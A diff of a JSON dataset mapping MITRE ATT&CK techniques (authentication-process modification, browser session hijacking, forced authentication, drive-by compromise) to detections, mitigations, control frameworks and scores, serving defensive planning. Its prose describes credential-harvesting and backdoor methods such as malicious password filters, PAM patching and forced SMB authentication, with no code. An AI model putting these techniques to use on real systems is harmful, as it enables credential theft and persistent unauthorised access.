+                "description": "Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. \n\nWindows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. \n\nAdversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)",
+                "detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference.\n\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)",
+                "mitigations": [
+                    {
+                        "mid": "M1028",
+                        "name": "Operating System Configuration",
+                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1028"
+                    }
+                ]
+            },
+            {
+                "tid": "T1556.003",
+                "name": "Modify Authentication Process: Pluggable Authentication Modules",
+                "url": "https://attack.mitre.org/techniques/T1556/003",
+                "description": "Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)\n\nAdversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)\n\nMalicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)",
+                "detection": "Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nLook for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).",
+                "mitigations": [
+                    {
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            },
+            {
+                "tid": "T1556.004",
+                "name": "Modify Authentication Process: Network Device Authentication",
+                "url": "https://attack.mitre.org/techniques/T1556/004",
+                "description": "Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.\n\n[Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password.  The modification includes a specific password which is implanted in the operating system image via the patch.  Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock)",
+                "detection": "Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)\n\nDetection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601).",
+                "mitigations": [
+                    {
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            }
+        ],
         "mitigations": [
             {
-                "mid": "M1047",
-                "name": "Audit",
-                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                "url": "https://attack.mitre.org/mitigations/M1047"
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
             },
             {
-                "mid": "M1038",
-                "name": "Execution Prevention",
-                "description": "Block execution of code on a system through application control, and/or script blocking.",
-                "url": "https://attack.mitre.org/mitigations/M1038"
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
             },
             {
-                "mid": "M1033",
-                "name": "Limit Software Installation",
-                "description": "Block users or groups from installing unapproved software.",
-                "url": "https://attack.mitre.org/mitigations/M1033"
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
             },
             {
-                "mid": "M1051",
-                "name": "Update Software",
-                "description": "Perform regular software updates to mitigate exploitation risk.",
-                "url": "https://attack.mitre.org/mitigations/M1051"
+                "mid": "M1025",
+                "name": "Privileged Process Integrity",
+                "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.",
+                "url": "https://attack.mitre.org/mitigations/M1025"
             },
             {
-                "mid": "M1017",
-                "name": "User Training",
-                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                "url": "https://attack.mitre.org/mitigations/M1017"
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
             }
         ],
-        "cumulative_score": 0.3243595138095238,
-        "adjusted_score": 0.3243595138095238,
+        "cumulative_score": 0.3952380952380953,
+        "adjusted_score": 0.3952380952380953,
         "has_car": false,
-        "has_sigma": true,
+        "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
         "cis_controls": [
-            "2.3",
-            "2.5",
-            "2.7",
+            "2.6",
             "4.1",
-            "9.4",
-            "14.4",
+            "4.7",
+            "5.1",
+            "5.3",
+            "5.4",
+            "5.5",
+            "6.1",
+            "6.2",
+            "6.4",
+            "6.5",
+            "6.8",
+            "12.2",
             "18.3",
             "18.5"
         ],
         "nist_controls": [
+            "AC-2",
+            "AC-20",
+            "AC-3",
+            "AC-5",
             "AC-6",
+            "AC-7",
             "CA-7",
-            "CA-8",
-            "CM-11",
             "CM-2",
-            "CM-3",
             "CM-5",
             "CM-6",
             "CM-7",
-            "RA-5",
-            "SC-7",
-            "SI-10",
-            "SI-3",
+            "IA-2",
+            "IA-5",
+            "SC-39",
             "SI-4",
             "SI-7"
         ],
         "process_coverage": true,
-        "network_coverage": true,
+        "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.22380952380952382,
-            "mitigation_score": 0.41818181818181815,
-            "detection_score": 0.01
+            "combined_score": 0.29523809523809524,
+            "mitigation_score": 0.5636363636363636
         },
         "choke_point_score": 0.1,
-        "prevalence_score": 0.00054999
+        "prevalence_score": 0
     },
     {
-        "tid": "T1185",
-        "name": "Browser Session Hijacking",
-        "description": "Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)\n\nA specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/administrator rights.\n\nAnother example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)",
-        "url": "https://attack.mitre.org/techniques/T1185",
+        "tid": "T1556.001",
+        "name": "Modify Authentication Process: Domain Controller Authentication",
+        "description": "Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. \n\nMalware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)",
+        "url": "https://attack.mitre.org/techniques/T1556/001",
         "tactics": [
-            "Collection"
+            "Credential Access",
+            "Defense Evasion",
+            "Persistence"
         ],
-        "detection": "This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. New processes may not be created and no additional software dropped to disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for [Process Injection](https://attack.mitre.org/techniques/T1055) against browser applications.",
+        "detection": "Monitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)\n\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g. a user has an active login session but has not entered the building or does not have VPN access). ",
         "platforms": [
             "Windows"
         ],
         "data_sources": [
+            "File: File Modification",
             "Logon Session: Logon Session Creation",
-            "Process: Process Access",
-            "Process: Process Modification"
+            "Process: OS API Execution",
+            "Process: Process Access"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1556",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1018",
-                "name": "User Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1018"
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
             },
             {
-                "mid": "M1017",
-                "name": "User Training",
-                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                "url": "https://attack.mitre.org/mitigations/M1017"
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1025",
+                "name": "Privileged Process Integrity",
+                "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.",
+                "url": "https://attack.mitre.org/mitigations/M1025"
             }
         ],
-        "cumulative_score": 0.30878105476190476,
-        "adjusted_score": 0.30878105476190476,
+        "cumulative_score": 0.36190476190476195,
+        "adjusted_score": 0.36190476190476195,
         "has_car": false,
         "has_sigma": true,
         "has_es_siem": false,
         "has_splunk": false,
         "cis_controls": [
-            "3.3",
+            "2.6",
+            "4.1",
             "4.7",
+            "5.1",
             "5.3",
+            "5.4",
+            "5.5",
             "6.1",
             "6.2",
-            "6.8",
-            "14.4"
+            "6.4",
+            "6.5",
+            "6.8"
         ],
         "nist_controls": [
-            "AC-10",
-            "AC-12",
             "AC-2",
+            "AC-20",
             "AC-3",
             "AC-5",
             "AC-6",
+            "AC-7",
             "CA-7",
-            "CM-2",
             "CM-5",
+            "CM-6",
             "IA-2",
-            "SC-23",
-            "SI-3",
+            "IA-5",
+            "SC-39",
             "SI-4",
             "SI-7"
         ],
@@ -8035,493 +30901,323 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.20476190476190478,
-            "mitigation_score": 0.38181818181818183,
-            "detection_score": 0.01
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.00401915
+        "hardware_coverage": false
     },
     {
-        "tid": "T1187",
-        "name": "Forced Authentication",
-        "description": "Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.\n\nThe Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.\n\nWeb Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)\n\nAdversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)\n\nThere are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:\n\n* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)\n* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\\\[remote address]\\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)",
-        "url": "https://attack.mitre.org/techniques/T1187",
+        "tid": "T1556.002",
+        "name": "Modify Authentication Process: Password Filter DLL",
+        "description": "Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. \n\nWindows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. \n\nAdversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)",
+        "url": "https://attack.mitre.org/techniques/T1556/002",
         "tactics": [
-            "Credential Access"
+            "Credential Access",
+            "Defense Evasion",
+            "Persistence"
         ],
-        "detection": "Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.\n\nMonitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)",
+        "detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference.\n\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)",
         "platforms": [
             "Windows"
         ],
         "data_sources": [
-            "File: File Access",
             "File: File Creation",
-            "File: File Modification",
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow"
+            "Module: Module Load",
+            "Windows Registry: Windows Registry Key Modification"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1556",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1037",
-                "name": "Filter Network Traffic",
-                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                "url": "https://attack.mitre.org/mitigations/M1037"
-            },
-            {
-                "mid": "M1027",
-                "name": "Password Policies",
-                "description": "Set and enforce secure password policies for accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1027"
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
             }
         ],
-        "cumulative_score": 0.35476190476190483,
-        "adjusted_score": 0.35476190476190483,
-        "has_car": true,
-        "has_sigma": true,
+        "cumulative_score": 0.15714285714285714,
+        "adjusted_score": 0.15714285714285714,
+        "has_car": false,
+        "has_sigma": false,
         "has_es_siem": false,
-        "has_splunk": true,
+        "has_splunk": false,
         "cis_controls": [
-            "4.2",
-            "4.4",
-            "4.7",
-            "5.2",
-            "7.6",
-            "7.7",
-            "13.4",
-            "18.2",
-            "18.3"
+            "4.1",
+            "18.3",
+            "18.5"
         ],
         "nist_controls": [
-            "AC-3",
-            "AC-4",
-            "CA-7",
-            "CM-2",
             "CM-6",
             "CM-7",
-            "SC-7",
-            "SI-10",
-            "SI-15",
             "SI-4"
         ],
-        "process_coverage": false,
-        "network_coverage": true,
+        "process_coverage": true,
+        "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.20476190476190478,
-            "mitigation_score": 0.34545454545454546,
-            "detection_score": 0.05
-        },
-        "choke_point_score": 0.15000000000000002,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1189",
-        "name": "Drive-by Compromise",
-        "description": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).\n\nMultiple ways of delivering exploit code to a browser exist, including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.\n* Malicious ads are paid for and served through legitimate ad providers.\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n    * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n    * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.\n\nAdversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)",
-        "url": "https://attack.mitre.org/techniques/T1189",
+        "tid": "T1556.003",
+        "name": "Modify Authentication Process: Pluggable Authentication Modules",
+        "description": "Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)\n\nAdversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)\n\nMalicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)",
+        "url": "https://attack.mitre.org/techniques/T1556/003",
         "tactics": [
-            "Initial Access"
+            "Credential Access",
+            "Defense Evasion",
+            "Persistence"
         ],
-        "detection": "Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.\n\nNetwork intrusion detection systems, sometimes with SSL/TLS inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.\n\nDetecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.",
+        "detection": "Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nLook for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).",
         "platforms": [
             "Linux",
-            "SaaS",
-            "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Application Log: Application Log Content",
-            "File: File Creation",
-            "Network Traffic: Network Connection Creation",
-            "Network Traffic: Network Traffic Content",
-            "Process: Process Creation"
+            "File: File Modification",
+            "Logon Session: Logon Session Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1556",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1048",
-                "name": "Application Isolation and Sandboxing",
-                "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
-                "url": "https://attack.mitre.org/mitigations/M1048"
-            },
-            {
-                "mid": "M1050",
-                "name": "Exploit Protection",
-                "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
-                "url": "https://attack.mitre.org/mitigations/M1050"
-            },
-            {
-                "mid": "M1021",
-                "name": "Restrict Web-Based Content",
-                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
-                "url": "https://attack.mitre.org/mitigations/M1021"
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
             },
             {
-                "mid": "M1051",
-                "name": "Update Software",
-                "description": "Perform regular software updates to mitigate exploitation risk.",
-                "url": "https://attack.mitre.org/mitigations/M1051"
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
             }
         ],
-        "cumulative_score": 0.4244441238095238,
-        "adjusted_score": 0.4244441238095238,
+        "cumulative_score": 0.30000000000000004,
+        "adjusted_score": 0.30000000000000004,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
-            "2.3",
-            "2.7",
-            "7.1",
-            "7.2",
-            "7.4",
-            "7.5",
-            "9.1",
-            "9.3",
-            "9.6",
-            "10.5",
-            "18.3",
-            "18.5"
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.4",
+            "6.5",
+            "6.8"
         ],
         "nist_controls": [
-            "AC-4",
+            "AC-2",
+            "AC-20",
+            "AC-3",
+            "AC-5",
             "AC-6",
-            "CA-7",
-            "CM-2",
+            "AC-7",
+            "CM-5",
             "CM-6",
-            "CM-8",
-            "SA-22",
-            "SC-18",
-            "SC-2",
-            "SC-29",
-            "SC-3",
-            "SC-30",
-            "SC-39",
-            "SC-7",
-            "SI-2",
-            "SI-3",
+            "IA-2",
+            "IA-5",
             "SI-4",
             "SI-7"
         ],
-        "process_coverage": true,
-        "network_coverage": true,
+        "process_coverage": false,
+        "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.32380952380952377,
-            "mitigation_score": 0.5454545454545454,
-            "detection_score": 0.08
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.0006346
+        "hardware_coverage": false
     },
     {
-        "tid": "T1190",
-        "name": "Exploit Public-Facing Application",
-        "description": "Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), network device administration and management protocols (like SNMP and Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). \n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)",
-        "url": "https://attack.mitre.org/techniques/T1190",
+        "tid": "T1556.004",
+        "name": "Modify Authentication Process: Network Device Authentication",
+        "description": "Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.\n\n[Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password.  The modification includes a specific password which is implanted in the operating system image via the patch.  Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock)",
+        "url": "https://attack.mitre.org/techniques/T1556/004",
         "tactics": [
-            "Initial Access"
+            "Credential Access",
+            "Defense Evasion",
+            "Persistence"
         ],
-        "detection": "Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.",
+        "detection": "Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)\n\nDetection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601).",
         "platforms": [
-            "Containers",
-            "IaaS",
-            "Linux",
-            "Network",
-            "Windows",
-            "macOS"
+            "Network"
         ],
         "data_sources": [
-            "Application Log: Application Log Content",
